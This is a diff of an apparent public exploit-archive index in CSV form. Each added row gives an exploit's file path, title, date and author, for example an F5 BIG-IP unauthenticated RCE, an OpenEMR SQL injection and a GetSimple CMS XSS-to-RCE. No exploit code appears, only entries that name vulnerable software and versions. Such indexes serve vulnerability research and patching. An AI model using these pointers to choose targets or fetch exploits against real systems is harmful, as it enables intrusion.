 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43639,6 +43643,7 @@ id,file,description,date,author,type,platform,port
 49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
 49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
 49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",2020-12-22,Mosaaed,webapps,php,
+49726,exploits/php/webapps/49726.py,"GetSimple CMS 3.3.16 - Reflected XSS to RCE",2021-03-30,boku,webapps,php,
 49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
 49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
 49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
@@ -43905,3 +43910,18 @@ id,file,description,date,author,type,platform,port
 49723,exploits/php/webapps/49723.txt,"Budget Management System 1.0 - 'Budget title' Stored XSS",2021-03-29,"Jitendra Kumar Tripathi",webapps,php,
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,
 49725,exploits/windows/webapps/49725.py,"SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow",2021-03-29,"Filipe Oliveira",webapps,windows,
+49727,exploits/multiple/webapps/49727.txt,"Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting",2021-03-30,cmOs,webapps,multiple,
+49729,exploits/php/webapps/49729.txt,"Zabbix 3.4.7 - Stored XSS",2021-03-31,"Radmil Gazizov",webapps,php,
+49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple,
+49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple,
+49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
+49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
+49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,
+49737,exploits/hardware/webapps/49737.txt,"ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation",2021-04-02,LiquidWorm,webapps,hardware,
+49738,exploits/hardware/webapps/49738.py,"F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)",2021-04-02,Al1ex,webapps,hardware,
+49740,exploits/php/webapps/49740.txt,"Simple Food Website 1.0 - Authentication Bypass",2021-04-05,"Viren Saroha",webapps,php,
+49741,exploits/php/webapps/49741.txt,"Basic Shopping Cart 1.0 - Authentication Bypass",2021-04-05,"Viren Saroha",webapps,php,
+49742,exploits/php/webapps/49742.py,"OpenEMR 4.1.0 - 'u' SQL Injection",2021-04-05,"Michael Ikua",webapps,php,
+49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",2021-04-05,gosh,webapps,windows,
+49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",2021-04-05,gosh,webapps,windows,
+49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion / Path Traversal",2021-04-06,gosh,webapps,ios,